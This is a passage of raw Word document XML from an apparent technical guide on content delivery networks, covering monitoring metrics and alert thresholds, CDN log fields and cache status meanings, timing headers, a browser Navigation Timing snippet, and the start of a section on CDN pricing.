            <w:r w:rsidRPr="00784ED6">
              <w:t>Error rate (5xx)</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73BE92" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN/origin errors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62D748" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 0.1%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="26CEC63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E0C7D7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Bandwidth saved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5F74A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin bandwidth reduction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09D8CB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&gt; 80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="05652F9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96864A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cache fill time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AAB712" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Time to populate cache after miss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3E26D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 1s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15DFAF1E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational metrics: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175"/>
        <w:gridCol w:w="3758"/>
        <w:gridCol w:w="2417"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3950D19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4DBDA8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Metric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71B2DE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Shows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E7CA83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Alert Threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="11EE4B1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856B10" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin health check failures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694384" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin availability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4FFEC9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Any failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4109457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C2DA83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Purge propagation time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45BFCA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>How fast invalidation takes effect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DB66F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&gt; 30s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3B8C3DD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BA506E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Edge storage utilization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AC44E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cache capacity usage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DC53EB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&gt; 85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4B4B057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2CD798" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Connection pool utilization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579312" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Origin connection health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B203DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&gt; 70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="68A5013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1D40FC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>SSL certificate expiry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52B11B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Certificate freshness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611D12" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 14 days remaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D2CBEB4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 CDN Logs and Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589CAE72" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What CDN logs contain (per request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD27F4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78527BA0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>timestamp, client_ip, country, city, method, url, status_code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DADFA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>cache_status (HIT/MISS/STALE/REVALIDATED/EXPIRED/BYPASS),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8053F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>bytes_sent, time_to_first_byte, origin_response_time,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1E08EB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>tls_version, http_version, user_agent, referer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4900B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>edge_pop (which PoP served it), ray_id (request trace ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACD15C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache status values and what they mean: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26"/>
        <w:gridCol w:w="3840"/>
        <w:gridCol w:w="3684"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="5A9476A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E87356" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>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9D9DEE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning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C09EAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2D65F39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984DF8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>HIT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F3D525" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Served from edge cache (fresh)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44D32B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Ideal — no improvement needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3249599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3E889A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>MISS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0B3DE1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Not in cache, fetched from origin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51DAF2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Expected for first request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="08CBE80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FDFFFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:lastRenderedPageBreak/>
              <w:t>STALE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5297D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Served stale while revalidating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9770B6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>SWR working correctly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1032B63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90722A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>REVALIDATED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787C23" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Checked origin, got 304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3F4479" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>TTL expired but content unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="77F941F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862BAA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>EXPIRED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45C2A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>TTL expired, fetched fresh from origin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48FC06" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Consider longer TTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="6360A65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64FED2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>BYPASS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908074" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cache intentionally skipped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9CA488" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Check if bypass rules are correct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="021482D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D9FC2D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>DYNAMIC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ABF008" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Marked as uncacheable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24711F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Evaluate if it could be cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67EB2327" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Real User Monitoring (RUM) with CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B074D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN-generated timing headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F85F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65434C77" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">Server-Timing: cdn-cache;desc="HIT", cdn-pop;desc="NRT" (Narita/Tokyo), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D9551C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">               edge;dur=2, origin;dur=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A2F1E1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>cdn-cache: Whether it was a hit or miss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26355B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>cdn-pop: Which edge location served it (debugging geographic routing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9BE1F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>edge;dur=2: Edge processing time (2ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F91D8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>origin;dur=0: No origin contact (hit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AB236" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Navigation Timing API (browser):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C437193" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268D179" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>// Measures DNS, TCP, TLS, TTFB, download — all affected by CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38C3DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>const timing = performance.getEntriesByType('navigation')[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE8B8A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>const dns = timing.domainLookupEnd - timing.domainLookupStart;     // Should be near 0 (cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC04F2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>const tcp = timing.connectEnd - timing.connectStart;                 // Low if edge is near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2556B39F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>const ttfb = timing.responseStart - timing.requestStart;            // Low if cache hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A35B069" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="735DC125">
          <v:rect id="_x0000_i4696" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD50DC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. CDN Cost Model and Economics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3E1EA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.1 How CDN Pricing Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588E8740" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth-based (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE799C2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46029CD0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>First 10 TB/month: $0.085/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46C2C8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Next 40 TB/month:  $0.080/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB7016" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Next 100 TB/month: $0.060/GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7D888" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>&gt; 150 TB/month:    $0.040/GB (volume discount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A9965" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request-based (additional charge):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B962D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D180F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP requests:  $0.0075 per 10,000 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70DDE1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTPS requests: $0.010  per 10,000 requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCBFD3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feature-based (add-ons):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57FF9A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge compute: per-invocation + CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F5C430" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Image optimization: per-transformation.</w:t>
      </w:r>
    </w:p>
